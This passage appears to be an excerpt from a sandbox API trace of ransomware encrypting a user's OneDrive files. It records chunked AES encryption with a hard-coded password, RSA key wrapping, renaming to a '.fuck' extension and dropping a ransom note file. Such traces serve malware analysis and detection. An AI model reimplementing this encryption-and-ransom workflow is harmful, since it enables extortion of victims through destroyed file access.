(in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.567] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.567] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.568] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.568] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.568] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.568] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.568] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.568] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.568] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.568] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.568] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.568] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.568] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.568] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.568] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.568] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.569] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.569] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.569] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.569] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.569] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.569] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.569] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.569] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.569] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.569] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.569] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.569] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.569] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.569] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.570] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.570] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.570] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.570] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.570] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.570] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.570] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.570] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.570] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.570] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.570] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.570] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.570] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.570] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.571] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.571] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.571] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x2d0, lpOverlapped=0x0) returned 1 [0273.571] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x2d0, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x2e0) returned 1 [0273.571] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x2e0, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x2e0, lpOverlapped=0x0) returned 1 [0273.571] CloseHandle (hObject=0x5d4c) returned 1 [0273.571] CloseHandle (hObject=0x5d48) returned 1 [0273.571] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ca\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ca\\filesync.localizedresources.dll.mui.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ca\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ca\\filesync.localizedresources.dll.mui"), bFailIfExists=0) returned 1 [0273.577] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ca\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x0) returned 1 [0273.578] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ca\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ca\\filesync.localizedresources.dll.mui.gsg")) returned 1 [0273.580] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ca\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ca\\filesync.localizedresources.dll.mui"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ca\\FileSync.LocalizedResources.dll.mui.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ca\\filesync.localizedresources.dll.mui.fuck")) returned 1 [0273.583] CryptDestroyHash (hHash=0x2fa6c8) returned 1 [0273.583] CryptDestroyKey (hKey=0x2fae08) returned 1 [0273.583] CryptReleaseContext (hProv=0x2f28c28, dwFlags=0x0) returned 1 [0273.583] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0273.583] FindClose (in: hFindFile=0x2fa4c8 | out: hFindFile=0x2fa4c8) returned 1 [0273.583] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ca\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ca\\readme_back_files.htm")) returned 0xffffffff [0273.583] AreFileApisANSI () returned 1 [0273.583] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28896f0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 96 [0273.583] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ca\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ca\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0273.584] GetFileType (hFile=0x5d3c) returned 0x1 [0273.585] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0273.590] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0273.590] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ca-es-valencia\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2fa4c8 [0273.590] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0273.590] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0273.590] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0273.590] GetLastError () returned 0x0 [0273.591] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ca-es-valencia\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ca-es-valencia\\filesync.localizedresources.dll.mui")) returned 0x20 [0273.591] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ca-es-valencia\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x80) returned 1 [0273.592] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ca-es-valencia\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ca-es-valencia\\filesync.localizedresources.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0273.593] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ca-es-valencia\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ca-es-valencia\\filesync.localizedresources.dll.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0273.595] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ca-es-valencia\\FileSync.LocalizedResources.dll.mui.gsg", dwFileAttributes=0x2) returned 1 [0273.595] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f28c28) returned 1 [0273.598] CryptCreateHash (in: hProv=0x2f28c28, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0273.598] lstrlenA (lpString="VjnQjmgTDrnneBnnDhUveiykzMlQm") returned 29 [0273.598] CryptHashData (hHash=0x2fa6c8, pbData=0x28cb710, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0273.598] CryptDeriveKey (in: hProv=0x2f28c28, Algid=0x6610, hBaseData=0x2fa6c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fae08) returned 1 [0273.598] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0273.598] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0273.598] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f28cb0) returned 1 [0273.599] CryptImportPublicKeyInfo (in: hCryptProv=0x2f28cb0, dwCertEncodingType=0x1, pInfo=0x2f33470*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f334a0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f334a8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fae88) returned 1 [0273.599] CryptEncrypt (in: hKey=0x2fae88, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0273.599] CryptEncrypt (in: hKey=0x2fae88, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f29420*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f29420*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0273.599] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f29420*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f29420*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0273.600] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.616] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.616] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.625] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.625] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.625] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.626] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.626] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.626] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.626] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.626] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.626] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.626] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.626] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.626] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.627] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) 